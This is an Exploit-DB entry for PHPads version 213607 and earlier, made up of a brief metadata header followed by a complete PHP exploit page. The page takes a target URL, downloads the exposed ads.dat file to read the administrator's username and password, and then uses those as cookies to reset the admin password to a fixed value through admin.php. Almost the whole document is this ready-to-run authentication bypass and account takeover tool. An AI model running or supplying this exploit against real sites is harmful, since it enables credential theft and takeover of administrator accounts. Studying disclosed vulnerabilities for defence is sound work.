PHPads <= 213607 - Authentication Bypass / Password Change Exploit

2014-12-15T00:00:00
ID EDB-ID:35535
Type exploitdb
Reporter Shaker msallm
Modified 2014-12-15T00:00:00

Description

PHPads <= 213607 - Authentication Bypass / Password Change Exploit. Webapps exploit for php platform

                                        
                                            &lt;title&gt; PHPads Authentication Bypass  Exploit &lt;/title&gt;
&lt;pre&gt;
PHPads Authentication Bypass / Administrator Password Change Exploit
&lt;form method="POST"&gt;
Target  : &lt;br&gt;&lt;input type="text" name="target" value="&lt;? if($_POST['target']) {echo $_POST['target']; }else{echo 'http://localhost:4545/phpads';} ?&gt;" size="70" /&gt;&lt;br /&gt;&lt;input type="submit" name="submit" /&gt;
&lt;/form&gt;
&lt;?php
function catchya($string, $start, $end)
{
	preg_match('/'.$start.'(.*)'.$end.'/', $string, $matches);
	return $matches[1];
}

function login($target)
{
	$ch = curl_init();
    curl_setopt($ch, CURLOPT_URL,$target."/ads.dat");
    curl_setopt($ch, CURLOPT_RETURNTRANSFER,true);
	$result = curl_exec($ch);
	$username = catchya($result, "user=", "\n");
	$password = catchya($result, "pass=", "\n");
	return array($username,$password);
	curl_close($ch);
}

function adminchange($target, $username, $password)
{
	$post = array('save' =&gt; '1',
	'newlogin' =&gt; $username,
	'newpass' =&gt; "htlover");
	$ch = curl_init();
    curl_setopt($ch, CURLOPT_URL,$target);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
	curl_setopt($ch, CURLOPT_COOKIE, 'user='.$username.'; pass='.$password);
	curl_setopt($ch,CURLOPT_POST,true);
    curl_setopt($ch,CURLOPT_POSTFIELDS,$post);
	$result = curl_exec($ch);
	if(preg_match("/Code Generator/", $result))
	{
		return "&lt;br&gt;&lt;br&gt;&lt;font color=green&gt;Success !! Password changed &lt;/font&gt;&lt;br&gt;username: ".$username." | password: htlover";
	}else{
		return "Something wrong &lt;br&gt;";
	}
	curl_close($ch);
}

if (isset($_POST['submit']))
{
	$target = $_POST['target'];
	//login($target, $username, $userid);
	$logins = login($target);
	echo "USERNAME :" . $logins[0]; // username
	echo "&lt;br&gt;PASSWORD :" . $logins[1]; // password
	echo adminchange($target.'/admin.php?action=config', $logins[0], $logins[1]);
}




?&gt;
&lt;/pre&gt;